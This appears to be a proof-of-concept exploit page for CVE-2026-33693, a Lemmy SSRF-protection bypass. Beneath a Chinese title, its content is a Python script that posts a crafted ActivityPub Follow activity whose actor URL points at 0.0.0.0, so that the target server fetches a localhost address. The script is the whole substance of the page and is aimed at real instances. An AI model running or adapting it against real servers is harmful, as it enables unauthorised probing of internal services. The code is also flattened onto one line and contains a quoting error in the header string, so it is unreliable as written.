CVE-2026-33693 Lemmy SSRF防护绕过漏洞

# PoC for CVE-2026-33693: SSRF via 0.0.0.0 in Lemmy # This script simulates sending a malicious ActivityPub object pointing to 0.0.0.0 import requests import json # The target Lemmy instance inbox URL target_inbox = "https://<target-lemmy-instance>/inbox" # Malicious actor URL pointing to 0.0.0.0 (Localhost) malicious_actor = "http://0.0.0.0:8080/actor" # Construct a basic ActivityPub Follow request payload = { "@context": "https://www.w3.org/ns/activitystreams", "type": "Follow", "actor": malicious_actor, "object": "https://<target-lemmy-instance>/u/admin" } headers = { "Content-Type": "application/ld+json; profile="https://www.w3.org/ns/activitystreams"" } print(f"Sending payload to {target_inbox}...") print(f"Payload: {json.dumps(payload, indent=2)}") try: # The server will attempt to fetch the 'actor' URL to verify it. # Due to the bug, it does not block 0.0.0.0, leading to an SSRF condition. response = requests.post(target_inbox, json=payload, headers=headers, timeout=10) print(f"Response Status: {response.status_code}") print(f"Response Body: {response.text}") except Exception as e: print(f"Request failed: {e}")